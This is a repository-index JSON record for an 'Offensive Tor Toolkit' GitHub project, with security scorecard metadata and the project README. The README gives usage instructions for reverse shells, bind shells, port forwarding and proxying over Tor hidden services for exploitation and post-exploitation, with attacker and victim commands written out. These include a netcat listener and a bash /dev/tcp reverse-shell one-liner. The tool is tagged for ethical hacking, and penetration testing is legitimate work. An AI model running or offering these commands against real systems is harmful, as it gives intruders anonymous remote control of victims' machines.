{"id":13521672,"url":"https://github.com/atorrescogollo/offensive-tor-toolkit","last_synced_at":"2026-01-14T12:44:52.319Z","repository":{"id":41293285,"uuid":"286546993","full_name":"atorrescogollo/offensive-tor-toolkit","owner":"atorrescogollo","description":"Bind/Reverse Shells, SOCKS, etc over Tor in Golang","archived":false,"fork":false,"pushed_at":"2021-07-03T00:59:16.000Z","size":339,"stargazers_count":60,"open_issues_count":1,"forks_count":9,"subscribers_count":3,"default_branch":"master","last_synced_at":"2025-03-31T20:38:04.624Z","etag":null,"topics":["bind-shell","ethical-hacking","hidden-services","reverse-shell","socks5","tor"],"latest_commit_sha":null,"homepage":"https://atorrescogollo.gitbook.io/offensive-tor-toolkit/","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/atorrescogollo.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-08-10T18:10:49.000Z","updated_at":"2025-01-17T06:48:42.000Z","dependencies_parsed_at":"2022-09-05T12:02:19.023Z","dependency_job_id":null,"html_url":"https://github.com/atorrescogollo/offensive-tor-toolkit","commit_stats":null,"previous_names":[],"tags_count":3,"template":false,"template_full_name":null,"purl":"pkg:github/atorrescogollo/offensive-tor-toolkit","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/atorrescogollo%2Foffensive-tor-toolkit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/atorrescogollo%2Foffensive-tor-toolkit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/atorrescogollo%2Foffensive-tor-toolkit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/atorrescogollo%2Foffensive-tor-toolkit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/atorrescogollo","download_url":"https://codeload.github.com/atorrescogollo/offensive-tor-toolkit/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/atorrescogollo%2Foffensive-tor-toolkit/sbom","scorecard":{"id":215405,"data":{"date":"2025-08-11","repo":{"name":"github.com/atorrescogollo/offensive-tor-toolkit","commit":"f612082494ef38fb561e9845e5513e0a627df01a"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":2.3,"checks":[{"name":"Code-Review","score":0,"reason":"Found 0/16 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/release.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: GNU General Public License v3.0: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v0.1 not signed: https://api.github.com/repos/atorrescogollo/offensive-tor-toolkit/releases/45650364","Warn: release artifact v0.0.2 not signed: https://api.github.com/repos/atorrescogollo/offensive-tor-toolkit/releases/45593515","Warn: release artifact v0.0.1 not signed: https://api.github.com/repos/atorrescogollo/offensive-tor-toolkit/releases/31842958","Warn: release artifact v0.1 does not have provenance: https://api.github.com/repos/atorrescogollo/offensive-tor-toolkit/releases/45650364","Warn: release artifact v0.0.2 does not have provenance: https://api.github.com/repos/atorrescogollo/offensive-tor-toolkit/releases/45593515","Warn: release artifact v0.0.1 does not have provenance: https://api.github.com/repos/atorrescogollo/offensive-tor-toolkit/releases/31842958"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'master'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yaml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/atorrescogollo/offensive-tor-toolkit/release.yaml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yaml:24: update your workflow using https://app.stepsecurity.io/secureworkflow/atorrescogollo/offensive-tor-toolkit/release.yaml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yaml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/atorrescogollo/offensive-tor-toolkit/release.yaml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yaml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/atorrescogollo/offensive-tor-toolkit/release.yaml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yaml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/atorrescogollo/offensive-tor-toolkit/release.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yaml:51: update your workflow using https://app.stepsecurity.io/secureworkflow/atorrescogollo/offensive-tor-toolkit/release.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/atorrescogollo/offensive-tor-toolkit/release.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yaml:62: update your workflow using https://app.stepsecurity.io/secureworkflow/atorrescogollo/offensive-tor-toolkit/release.yaml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yaml:70: update your workflow using https://app.stepsecurity.io/secureworkflow/atorrescogollo/offensive-tor-toolkit/release.yaml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yaml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/atorrescogollo/offensive-tor-toolkit/release.yaml/master?enable=pin","Warn: containerImage not pinned by hash: Dockerfile:1","Warn: containerImage not pinned by hash: Dockerfile:7: pin your Docker image by updating alpine:latest to alpine:latest@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","Info:   0 out of   4 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   6 third-party GitHubAction dependencies pinned","Info:   0 out of   2 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 1 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"11 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2022-0288","Warn: Project is vulnerable to: GO-2022-0969 / GHSA-69cg-p879-7622","Warn: Project is vulnerable to: GO-2022-1144 / GHSA-xrjj-mj9h-534m","Warn: Project is vulnerable to: GO-2023-1571 / GHSA-vvpx-j8f3-3w6h","Warn: Project is vulnerable to: GO-2023-1988 / GHSA-2wrh-6pvc-2jm9","Warn: Project is vulnerable to: GO-2023-2102 / GHSA-4374-p667-p6c8","Warn: Project is vulnerable to: GHSA-qppj-fm5r-hxr3","Warn: Project is vulnerable to: GO-2024-2687 / GHSA-4v7x-pqxf-cx7m","Warn: Project is vulnerable to: GO-2024-3333","Warn: Project is vulnerable to: GO-2025-3503 / GHSA-qxp5-gwg8-xv66","Warn: Project is vulnerable to: GO-2025-3595 / GHSA-vvgc-356p-c3xw"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:34:19.210Z","repository_id":41293285,"created_at":"2025-08-17T01:34:19.210Z","updated_at":"2025-08-17T01:34:19.210Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28420814,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-14T10:47:48.104Z","status":"ssl_error","status_checked_at":"2026-01-14T10:46:19.031Z","response_time":107,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bind-shell","ethical-hacking","hidden-services","reverse-shell","socks5","tor"],"created_at":"2024-08-01T06:00:36.972Z","updated_at":"2026-01-14T12:44:52.299Z","avatar_url":"https://github.com/atorrescogollo.png","language":"Go","funding_links":[],"categories":["Uncategorized","Applications"],"sub_categories":["Uncategorized","Other applications"],"readme":"# Offensive Tor Toolkit\n**Offensive Tor Toolkit** is a series of tools that simplify the use of Tor for typical **exploitation and post-exploitation tasks**.\n\nIn exploitation and post-exploitation phases, the victim needs to access Tor. All of this tools have an **embedded instance of Tor** and they are completely separated from each other. In this way, you only need to upload one file to the victim in order to run the required action.\n\nPlease, read the [**docs**](https://atorrescogollo.gitbook.io/offensive-tor-toolkit/) for more information.\n\n## TL;DR\n### Download Offensive Tor Toolkit\n\n```text\nexport VERSION=$(\n    curl -s \"https://api.github.com/repos/atorrescogollo/offensive-tor-toolkit/releases\" \\\n     | jq -r '.[].name | select(. | test(\"v[0-9]+\\\\.\"))' \\\n     | sort -rV | head -1\n)\n\n# Download the release\nwget https://github.com/atorrescogollo/offensive-tor-toolkit/releases/download/${VERSION}/offensive-tor-toolkit-${VERSION}.tar.gz\n\n# Uncompress\ntar -xvzf offensive-tor-toolkit-${VERSION}.tar.gz\n\n# Move to /opt/offensive-tor-toolkit/\nsudo mv offensive-tor-toolkit-${VERSION}* /opt\nsudo ln -sf offensive-tor-toolkit-${VERSION} /opt/offensive-tor-toolkit\ncd /opt/offensive-tor-toolkit\n```\n\n### Reverse Shell over Tor\n\n**Attacker**\n\n```text\n$ grep '^HiddenServicePort' /etc/tor/torrc\nHiddenServicePort 4444 127.0.0.1:4444\n$ nc -lvnp 4444\n```\n\n**Victim**\n\n```text\n$ ./reverse-shell-over-tor -listener m5et..jyd.onion:4444\n```\n\n### Bind Shell over Tor\n\n**Victim**\n\n```text\n$ ./hidden-bind-shell -data-dir /tmp/datadir/ -hiddensrvport 1234\n...\nBind shell is listening on hgnzi...g6yew.onion:1234\n```\n\n**Attacker**\n\n```text\n$ alias nctor='nc --proxy 127.0.0.1:9050 --proxy-type socks5'\n$ nctor -v hgnzi...g6yew.onion 1234\n```\n\n### Hidden Port Forwarding\n\n**Victim/Pivot**\n\n```text\n$ ./hidden-portforwarding -data-dir /tmp/pf-datadir -forward 127.0.0.1:1111 -hidden-port 9001\n...\nForwarding xa7l...a4el.onion:9001 -\u003e 127.0.0.1:8080\n```\n\n**Attacker**\n\n```text\n$ alias curltor=\"curl --socks5-hostname 127.0.0.1:9050\"\n$ curltor http://xa7l...a4el.onion:9001/\n```\n\n### TCP2Tor Proxy\n\n**Attacker**\n\n```text\n$ grep '^HiddenServicePort' /etc/tor/torrc\nHiddenServicePort 4444 127.0.0.1:4444\n$ nc -lvnp 4444\n```\n\n**Pivot**\n\n```text\n$ ./tcp2tor-proxy -listen 0.0.0.0:60101 -onion-forward m5et..jyd.onion:4444\n...\nProxying 0.0.0.0:60101 -\u003e m5et..jyd.onion:4444\n```\n\n**Victim**\n\n```text\n$ bash -i \u003e\u0026 /dev/tcp/\u003cPIVOT_IP\u003e/60101 0\u003e\u00261\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fatorrescogollo%2Foffensive-tor-toolkit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fatorrescogollo%2Foffensive-tor-toolkit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fatorrescogollo%2Foffensive-tor-toolkit/lists"}